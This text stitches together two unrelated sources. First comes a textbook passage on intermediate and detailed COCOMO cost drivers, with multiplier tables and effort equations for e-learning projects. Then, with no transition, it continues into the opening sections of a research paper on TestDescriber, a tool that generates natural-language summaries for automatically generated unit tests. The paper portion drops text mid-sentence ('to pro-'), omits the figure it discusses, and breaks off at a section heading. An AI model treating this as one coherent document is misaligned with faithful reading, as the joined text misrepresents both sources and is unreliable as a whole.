The Effort Adjustment Factor (EAF) reflects the increase or decrease in effort, and hence in cost, due to a set of environmental factors. These factors are also called cost drivers or cost adjustment factors (\(C_i\)s).
**Steps to determine the multiplying factor:**
1. Assign the numerical factors to the cost drivers.
2. Multiply the cost factors collectively to formulate the EAF.
When the cost factors are multiplied together, they can affect the project schedule and cost estimate by a factor of 10 or more. The product of the cost drivers is given as follows:
\[ EAF = C_1 \times C_2 \times \ldots \times C_n \]
(4.16)
$C_i = i^{th}$ cost adjustment factor
$C_i = 1$ represents the cost driver does not apply
$C_i > 1$ represents increased cost due to this factor
$C_i < 1$ represents decreased cost due to this factor.
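As a minimal sketch of equation (4.16), the EAF is simply the product of the applicable cost driver multipliers; the sample multiplier values below are hypothetical.

```python
# Sketch of the Effort Adjustment Factor (equation 4.16): the product of
# all applicable cost driver multipliers. The sample values are hypothetical.
from math import prod

def effort_adjustment_factor(multipliers):
    """EAF = C1 * C2 * ... * Cn; Ci = 1 means the driver does not apply."""
    return prod(multipliers)

# e.g. a driver above 1 (increases cost) combined with one below 1 (decreases it)
eaf = effort_adjustment_factor([1.15, 0.86, 1.00])
print(round(eaf, 4))
```

Because drivers below 1 and above 1 multiply, they can partially cancel: here 1.15 × 0.86 ≈ 0.989, a slight net decrease in effort.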
### 4.6.2 Categories of Cost Drivers
Cost drivers are classified into four categories. They are:
1. Product Attributes
2. Computer Attributes
3. Project Attributes
4. Personnel Attributes
**Product Attributes** – Some attributes increase or decrease the project cost depending on the nature of the product or the project itself. These attributes include:
- Essential reliability – mainly related to real time applications
- Product complexity – mainly related to execution time constraints
- Database size – mainly related to data processing applications
**Computer Attributes** – These attributes relate to the computer platform that supports the project being developed.
- Execution time constraints – arise when processor speed is barely sufficient
- Virtual machine volatility – relates to the hardware and operating system of the target system
- Computer turnaround time – applies to development
- Main storage constraints – arise when memory size is barely sufficient
**Project Attributes** – These attributes are related to tools and practices.
- Modern programming practices – uses structured methods or object-oriented ones
- Schedule compression / expansion – divergence from the ideal never helps, but a shorter schedule is worse than a longer one
- Modern programming tools – uses good debuggers, CASE and test generation tools
**Personnel Attributes** – These attributes describe the people who do the job. These factors tend to increase or decrease the cost.
- Programmer capability
- Analyst capability
- Application experience
- Programming language experience – uses tools and practices
- Virtual machine experience – uses hardware and operating system.
**Other Cost Drivers** – Additional attributes are sometimes added by the project manager to reflect other company strengths or weaknesses. These include:
- Development machine volatility – compilers, unstable OS, CASE tools, etc.
- Requirements volatility – a little is expected, but too much can be a great issue
- Access to data – sometimes very difficult
- Security requirements – applied for classified programs
- Impact of physical surroundings
- Impact of imposed methods and standards
**Table 4.5 Categories of Intermediate COCOMO Cost Driver**
<table>
<thead>
<tr>
<th>Product</th>
<th>Computer</th>
<th>Personnel</th>
<th>Project</th>
</tr>
</thead>
<tbody>
<tr>
<td>Required Software Reliability (RELY)</td>
<td>Execution Time Constraint (TIME)</td>
<td>Analyst Capability (ACAP)</td>
<td>Use of Modern Programming Practices (MODP)</td>
</tr>
<tr>
<td>Database Size (DATA)</td>
<td>Main Storage Constraint (STOR)</td>
<td>Application Experience (AEXP)</td>
<td>Use of Software Tools (TOOL)</td>
</tr>
<tr>
<td>Product Complexity (CPLX)</td>
<td>Virtual Machine Volatility (VIRT)</td>
<td>Programmer Capability (PCAP)</td>
<td>Required Development Schedule (SCED)</td>
</tr>
<tr>
<td></td>
<td>Computer Turnaround Time (TURN)</td>
<td>Virtual Machine Experience (VEXP)</td>
<td></td>
</tr>
<tr>
<td></td>
<td></td>
<td>Programming Language Experience (LEXP)</td>
<td></td>
</tr>
</tbody>
</table>
Table 4.5 illustrates the attributes and their corresponding categories. The product of the cost drivers is given as follows:
\[
C = RELY \times DATA \times CPLX \times TIME \times STOR \times VIRT \times \\
TURN \times ACAP \times AEXP \times PCAP \times VEXP \times LEXP \times MODP \times \\
TOOL \times SCED
\]
(4.17)
Each cost driver has a multiplying factor that determines the effect of the attribute on the effort. Each attribute receives a rating on a six-point scale ranging from very low to extra high. Table 4.6 shows the effort multiplier that applies to each rating of each cost driver.
### Table 4.6 Six Point Scale Rating
<table>
<thead>
<tr>
<th>Sno.</th>
<th>Cost Driver</th>
<th>Very Low</th>
<th>Low</th>
<th>Nominal</th>
<th>High</th>
<th>Very High</th>
<th>Extra High</th>
</tr>
</thead>
<tbody>
<tr><td colspan="8"><strong>Product Attributes</strong></td></tr>
<tr><td>1.</td><td>RELY</td><td>0.75</td><td>0.88</td><td>1.00</td><td>1.15</td><td>1.40</td><td></td></tr>
<tr><td>2.</td><td>DATA</td><td></td><td>0.94</td><td>1.00</td><td>1.08</td><td>1.16</td><td></td></tr>
<tr><td>3.</td><td>CPLX</td><td>0.70</td><td>0.85</td><td>1.00</td><td>1.15</td><td>1.30</td><td>1.65</td></tr>
<tr><td colspan="8"><strong>Hardware Attributes</strong></td></tr>
<tr><td>4.</td><td>TIME</td><td></td><td></td><td>1.00</td><td>1.11</td><td>1.30</td><td>1.66</td></tr>
<tr><td>5.</td><td>STOR</td><td></td><td></td><td>1.00</td><td>1.06</td><td>1.21</td><td>1.56</td></tr>
<tr><td>6.</td><td>VIRT</td><td></td><td>0.87</td><td>1.00</td><td>1.15</td><td>1.30</td><td></td></tr>
<tr><td>7.</td><td>TURN</td><td></td><td>0.87</td><td>1.00</td><td>1.07</td><td>1.15</td><td></td></tr>
<tr><td colspan="8"><strong>Personnel Attributes</strong></td></tr>
<tr><td>8.</td><td>ACAP</td><td>1.46</td><td>1.19</td><td>1.00</td><td>0.86</td><td>0.71</td><td></td></tr>
<tr><td>9.</td><td>AEXP</td><td>1.29</td><td>1.13</td><td>1.00</td><td>0.91</td><td>0.82</td><td></td></tr>
<tr><td>10.</td><td>PCAP</td><td>1.42</td><td>1.17</td><td>1.00</td><td>0.86</td><td>0.70</td><td></td></tr>
<tr><td>11.</td><td>VEXP</td><td>1.21</td><td>1.10</td><td>1.00</td><td>0.90</td><td></td><td></td></tr>
<tr><td>12.</td><td>LEXP</td><td>1.14</td><td>1.07</td><td>1.00</td><td>0.95</td><td></td><td></td></tr>
<tr><td colspan="8"><strong>Project Attributes</strong></td></tr>
<tr><td>13.</td><td>MODP</td><td>1.24</td><td>1.10</td><td>1.00</td><td>0.91</td><td>0.82</td><td></td></tr>
<tr><td>14.</td><td>TOOL</td><td>1.24</td><td>1.10</td><td>1.00</td><td>0.91</td><td>0.83</td><td></td></tr>
<tr><td>15.</td><td>SCED</td><td>1.23</td><td>1.08</td><td>1.00</td><td>1.04</td><td>1.10</td><td></td></tr>
</tbody>
</table>
The intermediate COCOMO model is represented as follows:
\[
E = a_i(KLOC)^{b_i}(EAF)
\]
(4.18)
Here, E denotes the effort in person-months,
KLOC denotes the estimated number of thousands of delivered lines of code,
EAF denotes the effort adjustment factor calculated from the cost drivers,
\( a_i \) is the coefficient and \( b_i \) is the exponent.
The development time estimation is similar to the basic COCOMO model.
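Combining equation (4.18) with the multipliers from Table 4.6, an intermediate COCOMO estimate can be sketched as follows; the project size, the rating choices and the small multiplier subset are hypothetical illustrations.

```python
# Sketch of an intermediate COCOMO estimate (equation 4.18) for the
# organic mode, using a small subset of the Table 4.6 multipliers.
# The project size and driver ratings below are hypothetical.

MULTIPLIERS = {  # subset of Table 4.6: driver -> {rating: multiplier}
    "RELY": {"nominal": 1.00, "high": 1.15},
    "CPLX": {"nominal": 1.00, "high": 1.15},
    "ACAP": {"nominal": 1.00, "high": 0.86},
    "SCED": {"nominal": 1.00, "low": 1.08},
}

def intermediate_effort(kloc, ratings, a=3.2, b=1.05):
    """E = a * (KLOC)^b * EAF, with EAF the product of driver multipliers.
    Drivers omitted from `ratings` are treated as nominal (multiplier 1)."""
    eaf = 1.0
    for driver, rating in ratings.items():
        eaf *= MULTIPLIERS[driver][rating]
    return a * kloc ** b * eaf

effort = intermediate_effort(
    10.0, {"RELY": "high", "ACAP": "high"})  # hypothetical 10 KLOC project
print(round(effort, 2))
```

A high reliability requirement (1.15) is almost offset here by a highly capable analyst team (0.86), illustrating how the cost drivers refine the basic estimate in both directions.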
4.7 DETAILED COCOMO MODEL IN E-LEARNING PROJECTS
The detailed COCOMO model includes all the properties of the intermediate version, together with the impact of the cost drivers on each step of the software engineering process. This model uses a different effort multiplier for each cost driver attribute in each phase, and estimates the amount of effort needed to complete each phase. Here, the e-learning project is divided into modules, the COCOMO model is applied to determine the effort of each module, and the module efforts are then summed. The effort of the e-learning project is estimated from the project size and cost drivers according to the software life cycle. The five phases of this COCOMO model are:
- Plan and Requirement
- System design
- Detailed design
- Module code and test
- Integration and test
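The module-level aggregation described above can be sketched as follows. The module sizes are hypothetical, and the simple organic formula stands in for detailed COCOMO's full phase-sensitive multipliers, which this sketch does not model.

```python
# Sketch of the detailed-COCOMO idea of estimating each module separately
# and summing the efforts. Module sizes are hypothetical, and a simple
# organic formula stands in for the phase-sensitive effort multipliers.

def module_effort(kloc, a=3.2, b=1.05, eaf=1.0):
    """Effort for one module: a * (KLOC)^b * EAF."""
    return a * kloc ** b * eaf

def project_effort(module_sizes_kloc):
    """Total project effort as the sum of the module-level estimates."""
    return sum(module_effort(size) for size in module_sizes_kloc)

total = project_effort([2.0, 3.5, 1.2])  # hypothetical module sizes in KLOC
print(round(total, 2))
```

Estimating per module and summing lets each module carry its own cost driver ratings, which is the main refinement of the detailed model over a single whole-project estimate.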
4.8 SUMMARY
In the proposed method, the three types of COCOMO models are applied on the e-learning project to determine the efforts required for project completion. The experimentation results and analysis on the e-learning project outcomes are explained in the next chapter.
The Impact of Test Case Summaries on Bug Fixing Performance: An Empirical Investigation
Sebastiano Panichella, Annibale Panichella, Moritz Beller, Andy Zaidman, Harald C. Gall
1 University of Zürich, Switzerland
2 Delft University of Technology, The Netherlands
panichella@ifi.uzh.ch (a.panichella, m.m.beller, a.e.zaidman)@tudelft.nl gall@ifi.uzh.ch
ABSTRACT
Automated test generation tools have been widely investigated with the goal of reducing the cost of testing activities. However, generated tests have been shown not to help developers in detecting and finding more bugs even though they reach higher structural coverage compared to manual testing. The main reason is that generated tests are difficult to understand and maintain. Our paper proposes an approach, coined TestDescriber, which automatically generates test case summaries of the portion of code exercised by each individual test, thereby improving understandability. We argue that this approach can complement the current techniques around automated unit test generation or search-based techniques designed to generate a possibly minimal set of test cases. In evaluating our approach we found that (1) developers find twice as many bugs, and (2) test case summaries significantly improve the comprehensibility of test cases, which is considered particularly useful by developers.
Categories and Subject Descriptors
D.2.5 [Software Engineering]: Testing and Debugging—Code Inspections and Walk-throughs, Testing Tools;
D.2.7 [Software Engineering]: Distribution, Maintenance, and Enhancement—Documentation, Enhancement
Keywords
Software testing, Test Case Summarization, Empirical Study
1. INTRODUCTION
Software testing is a key activity of software development and software quality assurance in particular. However, it is also expensive, with overall testing consuming as much as 50% of overall project effort [8, 36], and programmers spending a quarter of their work time on developer testing [6].
Several search-based techniques and tools [16, 21, 40] have been proposed to reduce the time developers need to spend on testing by automatically generating a (possibly minimal) set of test cases with respect to a specific test coverage criterion [11, 21, 25, 28, 41, 43, 51, 54]. These research efforts produced important results: automated test case generation allows developers to (i) reduce the time and cost of the testing process [5, 11, 13, 54]; to (ii) achieve higher code coverage when compared to the coverage obtained through manual testing [10, 22, 41, 43, 51]; to (iii) find violations of automated oracles (e.g. undeclared exceptions) [16, 22, 35, 40].
Despite these undisputed advances, creating test cases manually is still prevalent in software development. This is partially due to the fact that professional developers perceive generated test cases as hard to understand and difficult to maintain [18, 44]. Indeed, a recent study [23, 24] reported that developers spend up to 50% of their time in understanding and analyzing the output of automatic tools. As a consequence, automatically generated tests do not improve the ability of developers to detect faults when compared to manual testing [12, 23, 24]. Recent research has challenged the assumption that structural coverage is the only goal to optimize [1, 56], showing that when systematically improving the readability of the code composing the generated tests, developers tend to prefer the improved tests and were able to perform maintenance tasks in less time (about 14%) and at the same level of accuracy [18]. However, there is no empirical evidence that such readability improvements produce tangible results in terms of the number of bugs actually found by developers.
This paper builds on the finding that readability of test cases is a key factor to optimize in the context of automated test generation. However, we conjecture that the quality of the code composing the generated test cases (e.g., input parameters, assertions, etc.) is not the only factor affecting their comprehensibility. For example, consider the unit test test0 in Figure 1, which was automatically generated for the target class Option2. From a bird’s-eye view, the code of the test is pretty short and simple: it contains a constructor and two assertions calling get methods. However, it is difficult to tell, without reading the contents of the target class, (i) what is the behavior under test, (ii) whether the generated assertions are correct, (iii) which if-conditions are eventually traversed when executing the test (coverage). Thus, we need a solution that helps developers to quickly understand both tests and code covered.
Paper contribution. To handle this problem, our paper proposes an approach, coined TestDescriber, which is designed to automatically generate summaries of the portion of code exercised by each individual test case to pro-
\(^{1}\)The test case has been generated using Evosuite [21].
\(^{2}\)The class Option has been extracted from the Apache Commons library.
2. THE TESTDESCRIBER APPROACH
This section details the TestDescriber approach.
2.1 Approach Overview
Figure 2 depicts the proposed TestDescriber approach, which is designed to automatically generate summaries for test cases by leveraging (i) structural coverage information and (ii) existing approaches to code summarization. In particular, TestDescriber generates summaries for the portion of code exercised by each individual test case, thus providing a dynamic view of the code under test. We note that, unlike TestDescriber, existing approaches to code summarization [19, 20, 34, 37, 48] generate static summaries of source code without taking into account which part of the code is exercised during test case execution. Our approach consists of four steps: (1) Test Case Generation, (2) Test Coverage Analysis, (3) Summary Generation, and (4) Summary Aggregation. In the first step, Test Case Generation, we generate test cases using Evosuite [21]. In the second step, Test Coverage Analysis, TestDescriber identifies the code exercised by each individual test case generated in the previous step. To detect the executed lines of code we rely on Cobertura\(^4\), a tool based on jcoverage\(^5\). The goal of this step is to collect the information that will be summarized in the next steps, such as the list of statements tested by each test case, the class attributes used, the parameters used, and the conditional statements covered. During the Summary Generation step, TestDescriber takes the collected information and generates a set of summaries at different levels of granularity: (i) a global description of the class under test, (ii) a global description of each test case, and (iii) a set of fine-grained descriptions of each test case (describing, for example, the statements and/or branches executed by the test case). Finally, during the Summary Aggregation step, the extracted information and descriptions are added to the original test suite.
An example of tests summaries generated by TestDescriber, for the test case showed in Figure 1, which tests the Java Class Option of the system Apache Commons CLI\(^6\), can be found in Figure 3. The complete example of generated test suite for such class is available online\(^7\).
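At a very high level, the four-step pipeline above can be sketched as follows. Every function name and data shape here is a hypothetical placeholder standing in for the real tools (EvoSuite, Cobertura, the summary generator), not TestDescriber's actual API.

```python
# Very high-level sketch of the four TestDescriber steps. All function
# names and data shapes are hypothetical placeholders, not the tool's API.

def generate_tests(class_under_test):
    """Step 1: test case generation (EvoSuite in the paper)."""
    return [f"test{i}" for i in range(2)]

def coverage_of(test):
    """Step 2: per-test coverage analysis (Cobertura in the paper)."""
    return {"covered_lines": [1, 2, 3], "branches": ["cond1=true"]}

def summarize(test, coverage):
    """Step 3: summary generation from the covered code elements."""
    n = len(coverage["covered_lines"])
    return f"{test} exercises {n} lines ({', '.join(coverage['branches'])})"

def aggregate(tests_with_summaries):
    """Step 4: summary aggregation back into the test suite, as comments."""
    return "\n".join(f"// {s}\n{t}" for t, s in tests_with_summaries)

tests = generate_tests("Option")
suite = aggregate([(t, summarize(t, coverage_of(t))) for t in tests])
print(suite)
```

The key design point the sketch captures is that summaries are computed per test case from *dynamic* coverage, then attached to the suite, rather than generated statically from the source alone.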
2.2 Test Suite Generation
Researchers have proposed several methods capable of automatically generating test input based on the source code of the program under test based on different search strategies, such as genetic algorithms [21, 41], symbolic execution [10], etc. Among them, we have selected Evosuite [21], a tool that automatically generates JUnit test cases with JUnit assertions for classes written in Java code. Internally, Evosuite uses a genetic algorithm to evolve candidate test suites (individuals) according to the chosen coverage criterion where the search is guided by a fitness function [21], which considers all the test targets (e.g., branches, statements, etc.) at the same time. In order to make the test cases produced more concise and understandable, at the end of the search process the best test suite is post-processed to reduce its size while preserving the maximum coverage achieved. The final step of this post-processing consists of adding test assertions, i.e., statements that check the outcome of the test code. These assertions are generated using a mutation-based heuristic [25], which adds all possible assertions and then selects the minimal subset of those able to reveal mutants injected in the code. Consequently, the final test suite serves
\(^{4}\)http://cobertura.github.io/cobertura/
\(^{5}\)http://java-source.net/open-source/code-coverage/jcoverage-gpl
\(^{6}\)https://commons.apache.org/proper/commons-cli/
\(^{7}\)http://www.if.uzh.ch/seal/people/panichella/TestOption.txt
as a starting point for a tester, who has to manually revise the assertions. It is important to note that the use of EvoSuite is not mandatory in this phase of TestDescriber; indeed, it is possible to rely on other existing tools, such as Randoop, to generate test cases. However, we selected EvoSuite since (1) it generates minimal test cases with a minimal set of test assertions while reaching high structural coverage [23, 24] and (2) it placed in the top two in the last three SBST tool competitions.
2.3 Test Coverage Analysis
Once the test cases are generated, TestDescriber relies on Cobertura to find out which statements and branches are exercised by each individual test case. However, to generate test summaries for the covered code we need more fine-grained information about the code elements composing each covered statement, such as attributes, method calls, and the conditions delimiting the traversed branches. In the next step TestDescriber extracts keywords from the identifier names of such code elements to build the main textual corpus required for generating the coverage summaries. Therefore, on top of Cobertura we built a parser based on JavaParser that collects the following information after the execution of each test case: (i) the list of attributes and methods of the CUT directly or indirectly invoked by the test case; (ii) for each invoked method, all the statements executed, the attributes/variables used, and the calls to other methods of the CUT; (iii) the Boolean values of branch decisions in the if-statements, to derive which conditions hold when a specific true/false branch of the CUT is covered. The output of this phase is the list of fine-grained code elements and the lines of code covered by each test case.
2.4 Summary Generation
The goal of this step is to provide the software developer with a higher-level view of which portion of the CUT each test case exercises. To generate this view, TestDescriber extracts natural language phrases from the underlying covered statements by implementing the well-known Software Word Usage Model (SWUM) proposed by Hill et al. [30]. The basic idea of SWUM is that actions, themes, and any secondary arguments can be derived from an arbitrary portion of code by making assumptions about different Java naming conventions, and using these assumptions to link linguistic information to programming language structure and semantics. Indeed, method signatures (including class name, method name, type, and formal parameters) and field signatures (including class name, type, and field name) usually contain verbs, nouns, and prepositional phrases that can be expanded to generate readable natural language sentences. For example, SWUM considers verbs in method names as the actions, while the theme (i.e., subjects and objects) can be found in the rest of the name, the formal parameters, and the class name.
Pre-processing. Before identifying the linguistic elements composing the covered statements of the CUT, we split the identifier names into component terms using the Java camel case convention [30, 48], which splits words based on capital letters, underscores, and numbers. Then, we expand abbreviations in identifiers and type names using both (i) an external dictionary of common short forms for English words [45] and (ii) a more sophisticated technique called contextual-based expansion [29], which searches for the most appropriate expansion of a given abbreviation (contained in class and method identifiers).
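The camel-case splitting step can be sketched as follows; this is a minimal illustration of the splitting rules named above (capital letters, underscores, numbers), not TestDescriber's actual implementation, and the class and method names are our own:

```java
import java.util.Arrays;
import java.util.List;

// Minimal sketch of identifier splitting by the Java camel-case
// convention: split on underscores, lower-to-upper transitions,
// acronym boundaries, and letter/digit boundaries, then lowercase.
public class IdentifierSplitter {

    public static List<String> split(String identifier) {
        String spaced = identifier
            .replace('_', ' ')
            // lower/digit followed by upper: "getKey" -> "get Key"
            .replaceAll("([a-z0-9])([A-Z])", "$1 $2")
            // acronym followed by a word: "CLIOption" -> "CLI Option"
            .replaceAll("([A-Z]+)([A-Z][a-z])", "$1 $2")
            // letter/digit boundaries: "Math4J" -> "Math 4 J"
            .replaceAll("([a-zA-Z])([0-9])", "$1 $2")
            .replaceAll("([0-9])([a-zA-Z])", "$1 $2");
        return Arrays.asList(spaced.trim().toLowerCase().split("\\s+"));
    }

    public static void main(String[] args) {
        System.out.println(split("getKey"));        // [get, key]
        System.out.println(split("ArrayIntList"));  // [array, int, list]
        System.out.println(split("has_arg"));       // [has, arg]
    }
}
```

The resulting lowercase terms form the corpus that the abbreviation-expansion and POS-tagging steps operate on.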
Part-of-speech tagging. Once the main terms are extracted from the identifier names, TestDescriber uses LanguageTool, a part-of-speech (POS) tagger, to derive which terms are verbs (actions), nouns (themes) and adjectives. Specifically, LanguageTool is an open-source Java library that provides a plethora of linguistic tools (e.g., spell checker, POS tagger, translator, etc.) for more than 20 different languages. The output of the POS tagging is then used to determine whether names (of methods or attributes) should be treated as Noun Phrases (NP), Verb Phrases (VP), or Prepositional Phrases (PP) [30]. According to the type of phrase, we use a set of heuristics similar to those of Hill et al. [30] and Sridhara et al. [48] to generate natural language sentences from the pre-processed and POS-tagged variables, attributes and method signatures.
Summary Generation. Starting from the noun, verb and prepositional phrases, TestDescriber applies a template-based strategy [34, 48] to generate summaries. This strategy consists of using pre-defined templates of natural language sentences that are filled with the output of SWUM, i.e., the pre-processed and tagged source code elements in covered statements. TestDescriber creates three different types of summaries at different levels of abstractions: (i) a general description of the CUT, which is generated during a specific sub-step of the Summary Generation called Class Level Summarization; (ii) a brief summary of the structural code coverage scores achieved by each individual JUnit test method; (iii) a fine grained description of the statement composing each JUnit test method in order to describe the flow of operations performed to test the CUT. These fine-grained descriptions are generated during two different sub-steps of the Summary Generation: the Fine-grained Statements Summarization and the Branch Covered Summarization. The first sub-step provides a summary for the statements in the JUnit test methods, while the latter describes the if-statements traversed in the executed path of the CUT.
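The template-filling idea can be sketched as below; the template wordings and method names are illustrative assumptions, not TestDescriber's actual templates:

```java
// Minimal sketch of template-based summary generation: pre-defined
// natural-language templates are filled with the action (verb) and
// theme (noun phrase) that SWUM derives from a covered statement.
// Template wordings are assumptions for illustration only; the
// third-person inflection naively appends "s" to the verb.
public class TemplateSummarizer {

    // e.g. action="get", theme="key", receiver="option0"
    static String describeMethodCall(String action, String theme, String receiver) {
        return String.format("The test %ss the %s of %s", action, theme, receiver);
    }

    static String describeConstructor(String className, String params) {
        return String.format("The test instantiates a new %s with %s", className, params);
    }

    public static void main(String[] args) {
        System.out.println(describeMethodCall("get", "key", "option0"));
        // -> The test gets the key of option0
        System.out.println(describeConstructor("Option", "a short option \"f\""));
    }
}
```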
Class Level Summarization. The focus of this step is to give the tester a quick idea of the responsibility of the class under test. The generated summary is especially useful when the class under test is not well commented/documented. To this end we implemented an approach similar to the one proposed by Moreno et al. [37] for summarizing Java classes. Specifically, Moreno et al. defined a heuristics-based approach for describing class behavior based on the most relevant methods, the superclass and class interfaces, and the role of the class within the system. In contrast, during the Class Level Summarization we focus on the single CUT, considering only its interface and its attributes, while a more detailed description of its methods and behaviour is constructed later, during the Fine-grained Statements Summarization sub-step. Specifically, during that sub-step only the lines executed by each test case are considered, using the coverage information as base data to describe the CUT behavior. Figure 3 shows an example of a summary (in orange) generated during the Class Level Summarization phase for the class Option.java. With this summary the developer can quickly understand the CUT without reading all of its lines of code.
**Test Method Summarization.** This step generates a general description of the statement coverage score achieved by each JUnit test method. This description is produced by leveraging the coverage information provided by Cobertura to fill a pre-defined *template*. An example of a summary generated by TestDescriber to describe the coverage score is depicted in Figure 3 (in yellow): before each JUnit test method (*test0* in the example), TestDescriber adds a comment reporting the percentage of statements covered by the given test method, independently of all the other test methods in *TestOption*. This type of description aims to identify the contribution of each test method to the final structural coverage score. In the future we plan to complement statement coverage by describing further coverage criteria (e.g., branch or mutation coverage).
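The coverage comment itself is a straightforward fill-in template; a minimal sketch follows, where the comment wording is an assumption, not TestDescriber's exact template:

```java
import java.util.Locale;

// Minimal sketch: fill a pre-defined template with the statement
// coverage achieved by a single test method, as reported by the
// coverage tool. The comment wording is assumed for illustration.
public class CoverageComment {

    static String forTestMethod(String testName, int coveredStatements, int totalStatements) {
        double pct = 100.0 * coveredStatements / totalStatements;
        // Locale.ROOT keeps the decimal separator stable across machines
        return String.format(Locale.ROOT,
            "// Test method %s covers %.1f%% (%d/%d) of the statements of the CUT",
            testName, pct, coveredStatements, totalStatements);
    }

    public static void main(String[] args) {
        System.out.println(forTestMethod("test0", 13, 65));
        // -> // Test method test0 covers 20.0% (13/65) of the statements of the CUT
    }
}
```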
**Fine-grained Statement Summarization.** As described in Section 2.3, TestDescriber extracts the fine-grained list of *code elements* (e.g., methods, attributes, local variables) composing each statement of the CUT covered by each JUnit test method. This information is provided as input to the Fine-grained Statements Summarization phase, in which TestDescriber performs the following three steps: (i) it parses all the instructions contained in a test method; (ii) it applies the SWUM methodology to each instruction, determining which kind of operation the considered statement performs (e.g., whether it declares a variable, uses a constructor/method of the class, or uses specific assertions) and which part of the code is executed; and (iii) it generates a set of customized natural-language sentences depending on the kind of instruction. To perform the first two steps, it assigns each statement to one of the following categories:
- **Constructor of the class.** A constructor typically implies the instantiation of an object, which is the implicit *action/verb*, with some properties (parameters).
In this case, our descriptor links the constructor call to its corresponding declaration in the CUT to map formal and actual parameters. Pre-processing and POS tagging are then performed to identify the verb, noun phrases and adjectives in the constructor signature. These linguistic elements are then used to fill natural language templates specific to constructors.
- **Method calls.** A method implements an operation and typically begins with a verb [30], which defines the main *action*, while the method caller and the parameters determine the *theme* and *secondary arguments*. Again, the linguistic elements identified after pre-processing and POS tagging are used to fill natural language templates specific to method calls. More precisely, the summarizer detects whether the result of a method call is assigned to a local variable (assignment statement) and adapts the description to that context. For particular methods, such as getters and setters, it uses ad-hoc templates that differ from those used for more general methods.
- **Assertion statements.** An assertion defines the test oracle and enables testing whether the CUT behaves as intended. In this case the name of the assertion method (e.g., `assertEquals`, `assertFalse`, `assertNotEquals`) defines the type of test, while the input parameters represent (i) the expected and (ii) the actual behavior. Therefore, the template for an assertion statement is defined by the (pre-processed) assertion name itself and the value(s) passed (and verified) as parameter(s) to the assertion. Figure 3 reports two examples of descriptions generated for assertion methods where one of the input parameters is a method call, e.g., `getKey()` (the summary is reported in line 23 and highlighted in green).
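The assertion templates can be sketched as follows; the generated wording and the class name are assumptions for illustration, not TestDescriber's actual templates:

```java
// Minimal sketch: describe a JUnit assertion statement from its
// name and arguments. For assertEquals, args[0] is the expected
// value and args[1] the actual one (JUnit's parameter order).
// The generated wording is assumed for illustration.
public class AssertionDescriber {

    static String describe(String assertionName, String... args) {
        switch (assertionName) {
            case "assertEquals":
                return "// checks that " + args[1] + " is equal to " + args[0];
            case "assertNotEquals":
                return "// checks that " + args[1] + " differs from " + args[0];
            case "assertFalse":
                return "// checks that " + args[0] + " is false";
            default:
                return "// checks " + assertionName + " on " + String.join(", ", args);
        }
    }

    public static void main(String[] args) {
        // e.g. assertEquals("f", option0.getKey());
        System.out.println(describe("assertEquals", "\"f\"", "option0.getKey()"));
        // -> // checks that option0.getKey() is equal to "f"
    }
}
```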

**Branch Coverage Summarization.** When a test method contains method/constructor calls, it is common that the test execution covers some if-conditions (branches) in the body of the called method/constructor. Thus, after the Fine-grained Statements Summarization step, TestDescriber enriches the standard method call description with a summary describing the Boolean expressions of the if-condition. Therefore, during the Branch Coverage Summarization step, TestDescriber generates a natural language description for the tested if-condition. When an if-condition is composed of multiple Boolean expressions combined via Boolean operators, we generate natural language sentences for the individual expressions and combine them. We also adapt the descriptions when an if-condition contains calls to other methods of the CUT. In the example reported in Figure 3, when executing the method call `getKey()` (line 27) for the object `option0`, the test method `test0` covers the false branch of the if-condition if (`opt == null`), i.e., it verifies that `option0` is not `null`. In Figure 3, lines 24, 25 and 26 (highlighted in red) represent the summary generated during the Branch Coverage Summarization for the method call `getKey()`.
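Describing a covered branch amounts to rendering the if-condition (or its negation, for the false branch) in natural language; below is a minimal sketch for simple binary comparisons, where the operator wordings and the class name are our own assumptions:

```java
import java.util.Map;

// Minimal sketch: render the covered branch of a simple binary
// if-condition in natural language. For the false branch the
// comparison is negated (e.g. "opt == null" -> "opt is not equal
// to null"). Operator wordings are illustrative assumptions.
public class BranchDescriber {

    private static final Map<String, String> TRUE_WORDING = Map.of(
        "==", "is equal to",
        "!=", "is not equal to",
        "<",  "is less than",
        ">=", "is greater than or equal to");

    private static final Map<String, String> FALSE_WORDING = Map.of(
        "==", "is not equal to",
        "!=", "is equal to",
        "<",  "is greater than or equal to",
        ">=", "is less than");

    static String describe(String lhs, String op, String rhs, boolean trueBranchTaken) {
        String verb = (trueBranchTaken ? TRUE_WORDING : FALSE_WORDING).get(op);
        return String.format("// the test covers the %s branch: %s %s %s",
                trueBranchTaken ? "true" : "false", lhs, verb, rhs);
    }

    public static void main(String[] args) {
        // test0 covers the false branch of: if (opt == null)
        System.out.println(describe("opt", "==", "null", false));
        // -> // the test covers the false branch: opt is not equal to null
    }
}
```

Compound conditions would be handled by describing each comparison and joining the fragments with the Boolean connectives, as the paragraph above describes.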
### 2.5 Summary Aggregation
The Information Aggregator is in charge of enriching the original JUnit test class with all the natural language summaries and descriptions provided by the summary generator. The summaries are presented as different block and inline comments: (i) the general description of the CUT is added as a block comment before the declaration of the test class; (ii) the brief summaries of the statement coverage scores achieved by each individual JUnit test method are added as block comments before the corresponding test method body; (iii) the fine-grained descriptions are inserted inside each test method as inline comments on the statements they summarize.
3. STUDY DESIGN AND PLANNING
3.1 Study Definition
The goal of our study is to investigate to what extent the summaries generated by TestDescriber improve the comprehensibility of automatically generated JUnit test cases and impact the ability of developers to fix bugs. We measure such an impact in the context of a testing scenario in which a Java class has been developed and must be tested using generated test cases, with the purpose of identifying and fixing bugs (if any) in the code. The quality focus is the understandability of automatically generated test cases when enriched with summaries, compared to test cases without summaries. The perspective is that of researchers interested in evaluating the effectiveness of automatic approaches for test case summarization when applied in a practical testing and bug fixing scenario. We therefore designed our study to answer the following research questions (RQs):
RQ1 How do test case summaries impact the number of bugs fixed by developers? Our first objective is to verify whether developers are able to identify and fix more faults when relying on automatically generated test cases enriched with summaries.
RQ2 How do test case summaries impact how developers change test cases in terms of structural and mutation coverage? The aim is to assess whether developers are more prone to change test cases to improve their structural coverage when summaries are available.
3.2 Study Context
